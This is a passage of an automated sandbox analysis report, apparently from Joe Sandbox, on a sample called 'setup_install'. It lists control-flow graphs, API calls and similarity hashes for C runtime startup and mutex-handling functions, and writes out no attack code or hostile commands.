4749dc 98169 48eb20 145 API calls 98153->98169 98155 4749e6 98170 469d60 111 API calls 98155->98170 98157 474a00 98158 474a30 98157->98158 98159 474a0e 98157->98159 98172 48ec80 107 API calls 98158->98172 98171 48ec80 107 API calls 98159->98171 98162 474a3e 98162->98107 98163 474a1a 98163->98107 98173 46a050 111 API calls 98164->98173 98166 4750a2 98167->98151 98168->98153 98169->98155 98170->98157 98171->98163 98172->98162 98173->98166 98174 41ceac 98175 41ce93 pthread_mutex_unlock 98174->98175 98177 41cee1 98175->98177 98178 41cea3 98175->98178 98192 495ca0 malloc 98177->98192 98182 41cf0b 98183 41e700 74 API calls 98182->98183 98184 41cf10 98183->98184 98185 497c55 98184->98185 98186 495e30 74 API calls 98184->98186 98187 40f8e0 54 API calls 98185->98187 98186->98185 98188 497c5a pthread_mutex_init malloc 98187->98188 98189 497c96 98188->98189 98190 4014c0 _onexit 98189->98190 98191 497cb4 98190->98191 98193 41ceed 98192->98193 98194 495ce2 98192->98194 98199 496390 98193->98199 98207 41ce40 74 API calls 98194->98207 98196 495ce9 98196->98193 98208 492890 74 API calls 98196->98208 98198 495cf4 98200 496399 98199->98200 98209 40f6e0 49 API calls 98200->98209 98202 4963ec 98210 495d60 74 API calls 98202->98210 98204 4963f4 98211 492890 74 API calls 98204->98211 98206 4963f9 98207->98196 98208->98198 98209->98202 98210->98204 98211->98206

                                                                                                                            Executed Functions

                                                                                                                            Function 0040115C Relevance: 19.7, APIs: 13, Instructions: 199sleepstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 359 40115c-40117a 360 401430-401439 GetStartupInfoA 359->360 361 401180-401191 359->361 365 401441-40145a _initterm 360->365 362 4011a7-4011b3 361->362 363 401193-401195 362->363 364 4011b5-4011bf 362->364 366 4013d0-4013dd 363->366 367 40119b-4011a4 Sleep 363->367 368 4013e3-4013f7 _amsg_exit 364->368 369 4011c5-4011cc 364->369 373 401464 365->373 366->368 366->369 367->362 371 4011ea-4011ec 368->371 372 4013fd-40141d _initterm 368->372 369->365 370 4011d2-4011e4 369->370 370->371 370->372 374 4011f2-4011f9 371->374 375 401423-401429 371->375 372->374 372->375 376 40146c-401492 exit call 40c500 373->376 377 401217-401257 call 40c990 SetUnhandledExceptionFilter call 41ba60 call 40c810 __p__acmdln 374->377 378 4011fb-401214 374->378 375->374 388 401271-401277 377->388 389 401259 377->389 378->377 390 401260-401262 388->390 391 401279-401284 388->391 392 4012b4-4012bc 389->392 396 401290-401292 390->396 397 401264-401267 390->397 393 40126e 391->393 394 4012d2-4012f2 malloc 392->394 395 4012be-4012c7 392->395 393->388 394->373 403 4012f8-401309 394->403 401 4013c0-4013c4 395->401 402 4012cd 395->402 399 401294 396->399 400 4012a5-4012ad 396->400 397->396 398 401269 397->398 398->393 404 4012af 399->404 400->404 405 4012a0-4012a3 400->405 401->402 402->394 406 401310-401344 strlen malloc memcpy 403->406 404->392 405->400 405->404 406->406 407 401346-401398 call 40c4c0 call 401637 406->407 407->376 412 40139e-4013a6 407->412 413 4013b2-4013bd 412->413 414 4013a8-4013ad _cexit 412->414 414->413
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1672962128-0
                                                                                                                            • Opcode ID: 6d036f36a2cce21afd20ba9991b88691311fb69fecd267e105e2e75a206005cc
                                                                                                                            • Instruction ID: 6b44881ec403cae6737a8d4838ee823ac2f2117ef65d3a0aa73010f89c7aaea6
                                                                                                                            • Opcode Fuzzy Hash: 6d036f36a2cce21afd20ba9991b88691311fb69fecd267e105e2e75a206005cc
                                                                                                                            • Instruction Fuzzy Hash: CF81ADB09046408FDB14EF65D9C476A7BE1FB44308F00853EE945AF3A2D7789845CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004013C9 Relevance: 13.6, APIs: 9, Instructions: 113stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 415 4013c9-4013dd 417 4013e3-4013f7 _amsg_exit 415->417 418 4011c5-4011cc 415->418 421 4011ea-4011ec 417->421 422 4013fd-40141d _initterm 417->422 419 401441-40145a _initterm 418->419 420 4011d2-4011e4 418->420 427 401464 419->427 420->421 420->422 423 4011f2-4011f9 421->423 424 401423-401429 421->424 422->423 422->424 425 401217-401257 call 40c990 SetUnhandledExceptionFilter call 41ba60 call 40c810 __p__acmdln 423->425 426 4011fb-401214 423->426 424->423 438 401271-401277 425->438 439 401259 425->439 426->425 429 40146c-40148d exit call 40c500 427->429 435 401492 429->435 440 401260-401262 438->440 441 401279-401284 438->441 442 4012b4-4012bc 439->442 446 401290-401292 440->446 447 401264-401267 440->447 443 40126e 441->443 444 4012d2-4012f2 malloc 442->444 445 4012be-4012c7 442->445 443->438 444->427 453 4012f8-401309 444->453 451 4013c0-4013c4 445->451 452 4012cd 445->452 449 401294 446->449 450 4012a5-4012ad 446->450 447->446 448 401269 447->448 448->443 454 4012af 449->454 450->454 455 4012a0-4012a3 450->455 451->452 452->444 456 401310-401344 strlen malloc memcpy 453->456 454->442 455->450 455->454 456->456 457 401346-401386 call 40c4c0 call 401637 456->457 461 40138b-401398 457->461 461->429 462 40139e-4013a6 461->462 463 4013b2-4013bd 462->463 464 4013a8-4013ad _cexit 462->464 464->463
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 738594520-0
                                                                                                                            • Opcode ID: 32f7d811c82c2b2cc25560e370dc547d507d8206d7807ffb899de0653459411c
                                                                                                                            • Instruction ID: 6a93bcfddadbc03612a849ef5871dfedfcd5feb2d824dc0a6eb1aabc9ab67a90
                                                                                                                            • Opcode Fuzzy Hash: 32f7d811c82c2b2cc25560e370dc547d507d8206d7807ffb899de0653459411c
                                                                                                                            • Instruction Fuzzy Hash: 744129B0A04641CBDB10EF65D9C075DB7E0FB48318F10893EE984AB362D7789985CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401150 Relevance: 10.6, APIs: 7, Instructions: 135sleepstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 465 401150-40117a 467 401430-401439 GetStartupInfoA 465->467 468 401180-401191 465->468 472 401441-40145a _initterm 467->472 469 4011a7-4011b3 468->469 470 401193-401195 469->470 471 4011b5-4011bf 469->471 473 4013d0-4013dd 470->473 474 40119b-4011a4 Sleep 470->474 475 4013e3-4013f7 _amsg_exit 471->475 476 4011c5-4011cc 471->476 480 401464 472->480 473->475 473->476 474->469 478 4011ea-4011ec 475->478 479 4013fd-40141d _initterm 475->479 476->472 477 4011d2-4011e4 476->477 477->478 477->479 481 4011f2-4011f9 478->481 482 401423-401429 478->482 479->481 479->482 483 40146c-401492 exit call 40c500 480->483 484 401217-401257 call 40c990 SetUnhandledExceptionFilter call 41ba60 call 40c810 __p__acmdln 481->484 485 4011fb-401214 481->485 482->481 495 401271-401277 484->495 496 401259 484->496 485->484 497 401260-401262 495->497 498 401279-401284 495->498 499 4012b4-4012bc 496->499 503 401290-401292 497->503 504 401264-401267 497->504 500 40126e 498->500 501 4012d2-4012f2 malloc 499->501 502 4012be-4012c7 499->502 500->495 501->480 510 4012f8-401309 501->510 508 4013c0-4013c4 502->508 509 4012cd 502->509 506 401294 503->506 507 4012a5-4012ad 503->507 504->503 505 401269 504->505 505->500 511 4012af 506->511 507->511 512 4012a0-4012a3 507->512 508->509 509->501 513 401310-401344 strlen malloc memcpy 510->513 511->499 512->507 512->511 513->513 514 401346-401398 call 40c4c0 call 401637 513->514 514->483 519 40139e-4013a6 514->519 520 4013b2-4013bd 519->520 521 4013a8-4013ad _cexit 519->521 521->520
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1672962128-0
                                                                                                                            • Opcode ID: 11efc081fbc7e29c6799ea98848bc8d03a866f21deb4ebcaecd01e2b3c4150b9
                                                                                                                            • Instruction ID: 829457283b6ea38d3b76390e7b74c204cdb006f5e88a4691093423f8d1c68ba8
                                                                                                                            • Opcode Fuzzy Hash: 11efc081fbc7e29c6799ea98848bc8d03a866f21deb4ebcaecd01e2b3c4150b9
                                                                                                                            • Instruction Fuzzy Hash: E6516D71A006408FDB10EF69D9C0B5AB7F4FB48318F11853EE944AB362D778A844CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CD00 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 570 41cd00-41cd17 pthread_mutex_lock 571 41ce2a-497c3a call 41e700 570->571 572 41cd1d-41cd28 570->572 587 497c3c call 495e30 571->587 588 497c41-497c4e call 40f8e0 571->588 574 41cd90-41cd93 572->574 575 41cd2a-41cd36 572->575 577 41cd99-41cda7 pthread_mutex_unlock 574->577 575->574 578 41cd38-41cd3b 575->578 580 41ce00-41ce25 call 495ca0 call 496390 577->580 581 41cda9-41cdb0 577->581 582 41cd41-41cd43 578->582 583 41cdd0-41cde2 578->583 580->571 584 41cde4-41cded 582->584 585 41cd49-41cd4b 582->585 583->577 594 41cd64-41cd66 584->594 589 41cd5a-41cd62 585->589 590 41cd4d-41cdfb 585->590 587->588 605 497c50 call 495e30 588->605 606 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 588->606 589->594 597 41cd52-41cd56 589->597 590->594 598 41cdc0-41cdcc 594->598 599 41cd68-41cd72 594->599 597->594 601 41cd58 597->601 598->599 602 41cdb1-41cdb7 599->602 603 41cd74-41cd87 599->603 601->589 602->577 603->577 605->606 610 497cb8-497ccc 606->610 611 497c96-497ca1 606->611 612 497ca8-497cb7 call 4014c0 610->612 611->612
                                                                                                                            APIs
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0041CD10
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0041CDA0
                                                                                                                            • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00497C72
                                                                                                                            • malloc.MSVCRT ref: 00497C88
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1674753379-0
                                                                                                                            • Opcode ID: c12d8279910de17378ce1d2d262f1287f1bc2b7b88222b7fedb715871bfffb8e
                                                                                                                            • Instruction ID: fc805101269874054daccf760f3ae0c0ad100dea116b13048e7b37034f5d57c2
                                                                                                                            • Opcode Fuzzy Hash: c12d8279910de17378ce1d2d262f1287f1bc2b7b88222b7fedb715871bfffb8e
                                                                                                                            • Instruction Fuzzy Hash: 36413DB46442018FDB10EF25E88066ABFE1BB55344F15C97FD488CB311E7799889CB9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CE40 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 615 41ce40-41ce56 pthread_mutex_lock 616 41cf0b-497c4e call 41e700 615->616 617 41ce5c-41ce78 615->617 632 497c50 call 495e30 616->632 633 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 616->633 618 41ce91 617->618 619 41ce7a-41ce7e 617->619 624 41ce93-41cea1 pthread_mutex_unlock 618->624 621 41ce80-41cedf 619->621 622 41ce8a-41ce8f 619->622 630 41ceb3-41cebd 621->630 622->618 626 41ce82-41ce86 622->626 628 41cee1-41cf06 call 495ca0 call 496390 624->628 629 41cea3-41ceab 624->629 634 41ceb0 626->634 635 41ce88 626->635 628->616 636 41ced2-41ced6 630->636 637 41cebf-41cecb 630->637 632->633 644 497cb8-497ccc 633->644 645 497c96-497ca1 633->645 634->630 635->622 641 41cecd-41ced0 636->641 637->641 641->624 646 497ca8-497cb7 call 4014c0 644->646 645->646
                                                                                                                            APIs
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1(?,?,?,00495CE9,?,?,?,?,?,004912A4,?,?,?,00484F48), ref: 0041CE4F
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1(?,?,?,00495CE9,?,?,?,?,?,004912A4,?,?,?,00484F48), ref: 0041CE9A
                                                                                                                              • Part of subcall function 00495CA0: malloc.MSVCRT ref: 00495CAE
                                                                                                                            • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00497C72
                                                                                                                            • malloc.MSVCRT ref: 00497C88
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$pthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 661434298-0
                                                                                                                            • Opcode ID: 5392ce2f16ff3625dba02e136c6aeca7ebd900fcfd41eb2ded9ca26cffd3a4c5
                                                                                                                            • Instruction ID: c376a0d38d821961fe63da185fa04e3fec2dedb467756fb52055367660d9628a
                                                                                                                            • Opcode Fuzzy Hash: 5392ce2f16ff3625dba02e136c6aeca7ebd900fcfd41eb2ded9ca26cffd3a4c5
                                                                                                                            • Instruction Fuzzy Hash: 11317EB46483008FDB00AF25D88436ABBE1FB42344F6589BFD5459B351E77D88898B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040479C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 649 40479c-4047a2 650 4047a8-4047ca 649->650 651 497bb0-497c3a 649->651 650->651 661 497c3c call 495e30 651->661 662 497c41-497c4e call 40f8e0 651->662 661->662 667 497c50 call 495e30 662->667 668 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 662->668 667->668 672 497cb8-497ccc 668->672 673 497c96-497ca1 668->673 674 497ca8-497cb7 call 4014c0 672->674 673->674
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: P=J
                                                                                                                            • API String ID: 1091013307-1864112018
                                                                                                                            • Opcode ID: 5efebdece90d411ca40bad844757085379d9133d969b9782b2f3721583cd0c25
                                                                                                                            • Instruction ID: 56b56456e8bae875309716c5668e3ccd0f68ced14db7752e60f6354ce1269257
                                                                                                                            • Opcode Fuzzy Hash: 5efebdece90d411ca40bad844757085379d9133d969b9782b2f3721583cd0c25
                                                                                                                            • Instruction Fuzzy Hash: 8A21F4B15092008FE700EF29E45971ABBE0BB5134DF00C66DE2C89B365D77DD5498F9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004047D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 677 4047d3-4047d9 678 497bbf-497c3a 677->678 679 4047df-404801 677->679 688 497c3c call 495e30 678->688 689 497c41-497c4e call 40f8e0 678->689 679->678 688->689 694 497c50 call 495e30 689->694 695 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 689->695 694->695 699 497cb8-497ccc 695->699 700 497c96-497ca1 695->700 701 497ca8-497cb7 call 4014c0 699->701 700->701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: F=J
                                                                                                                            • API String ID: 1091013307-2008533072
                                                                                                                            • Opcode ID: 395466bfebfef3510baed84129e5a2d00624f69017f4f23a547981517f00a44e
                                                                                                                            • Instruction ID: 7cb17624ceb8b996e778fd92a738ed88115afaa657c0dce43a6bd7df54d964ca
                                                                                                                            • Opcode Fuzzy Hash: 395466bfebfef3510baed84129e5a2d00624f69017f4f23a547981517f00a44e
                                                                                                                            • Instruction Fuzzy Hash: F12125B15092008FEB00EF25E44971ABBE0BB5134CF00C6AEE1C89B361D77DD5498F9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040496C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 704 40496c-404972 705 497bce-497c3a 704->705 706 404978-40499a 704->706 714 497c3c call 495e30 705->714 715 497c41-497c4e call 40f8e0 705->715 706->705 714->715 720 497c50 call 495e30 715->720 721 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 715->721 720->721 725 497cb8-497ccc 721->725 726 497c96-497ca1 721->726 727 497ca8-497cb7 call 4014c0 725->727 726->727
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: i=J
                                                                                                                            • API String ID: 1091013307-1151781261
                                                                                                                            • Opcode ID: 03759c6f47c5be1f50d3b2cc0fb7863f1c083d9eb5a5c84123aa28e07319a1ae
                                                                                                                            • Instruction ID: 1f47796c2ddeeea74b968ca47b0f9f376e2dca6e27a1570408240d62555d6660
                                                                                                                            • Opcode Fuzzy Hash: 03759c6f47c5be1f50d3b2cc0fb7863f1c083d9eb5a5c84123aa28e07319a1ae
                                                                                                                            • Instruction Fuzzy Hash: ED2104B15092008FEB00EF29E84971A7BE0BB5134DF11C66EE1C89B365D7BDD4498F9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004048FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 730 4048fe-404904 731 497bdd-497c3a 730->731 732 40490a-40492c 730->732 739 497c3c call 495e30 731->739 740 497c41-497c4e call 40f8e0 731->740 732->731 739->740 745 497c50 call 495e30 740->745 746 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 740->746 745->746 750 497cb8-497ccc 746->750 751 497c96-497ca1 746->751 752 497ca8-497cb7 call 4014c0 750->752 751->752
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: [=J
                                                                                                                            • API String ID: 1091013307-1665792115
                                                                                                                            • Opcode ID: 76a4c2e96216807a2570282dca91d8cf9c4ec7919792251280d73f0e9897f6af
                                                                                                                            • Instruction ID: e971329b29e39a3606a67b133eb94c3ab28b44833ef580fd4c15034f42a663db
                                                                                                                            • Opcode Fuzzy Hash: 76a4c2e96216807a2570282dca91d8cf9c4ec7919792251280d73f0e9897f6af
                                                                                                                            • Instruction Fuzzy Hash: 232124B15092008FEB00AF25E44971ABBE0BB5134CF11C5AEE1C89B365D77ED4498F9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040472E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 755 40472e-404734 756 497bfb-497c3a 755->756 757 40473a-40475c 755->757 762 497c3c call 495e30 756->762 763 497c41-497c4e call 40f8e0 756->763 757->756 762->763 768 497c50 call 495e30 763->768 769 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 763->769 768->769 773 497cb8-497ccc 769->773 774 497c96-497ca1 769->774 775 497ca8-497cb7 call 4014c0 773->775 774->775
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
